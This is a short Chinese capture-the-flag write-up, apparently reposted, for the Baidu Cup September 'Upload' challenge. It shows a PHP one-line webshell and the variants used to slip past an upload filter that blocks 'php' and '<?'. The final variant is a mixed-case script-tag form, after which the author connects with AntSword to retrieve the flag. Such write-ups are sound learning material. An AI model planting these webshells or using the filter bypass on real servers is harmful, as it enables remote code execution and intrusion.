百度杯CTF比赛 九月场(Upload)

页面题目:

百度杯CTF比赛 九月场(Upload),攻防知识,第1张

页面写着可以你可以随意上传文件,那就上传一个普通的一句话木马

<?php
eval($_REQUEST['a']);

百度杯CTF比赛 九月场(Upload),攻防知识,第2张

发现上传成功,然后点击上传成功

百度杯CTF比赛 九月场(Upload),攻防知识,第3张

发现没有解析,猜测有可能是过滤了php这个字符串,换成短标签试一下

<?
eval($_REQUEST['a']);
?>

发现也没有被解析

百度杯CTF比赛 九月场(Upload),攻防知识,第4张

怀疑还有可能过滤了<?符号,不过还可以用<script language="php"></script>,不过php被过滤了,可以换成PhP

<script language="PhP">
	eval($_REQUEST['a']);
</script>

百度杯CTF比赛 九月场(Upload),攻防知识,第5张

空白页面,php有可能解析了,然后用蚁剑连接。

百度杯CTF比赛 九月场(Upload),攻防知识,第6张

连接成功,也找到了flag。


转载请说明出处 内容投诉
九牛网 » 百度杯CTF比赛 九月场(Upload)

发表评论

欢迎 访客 发表评论

定制开发服务!

技术支持 联系我们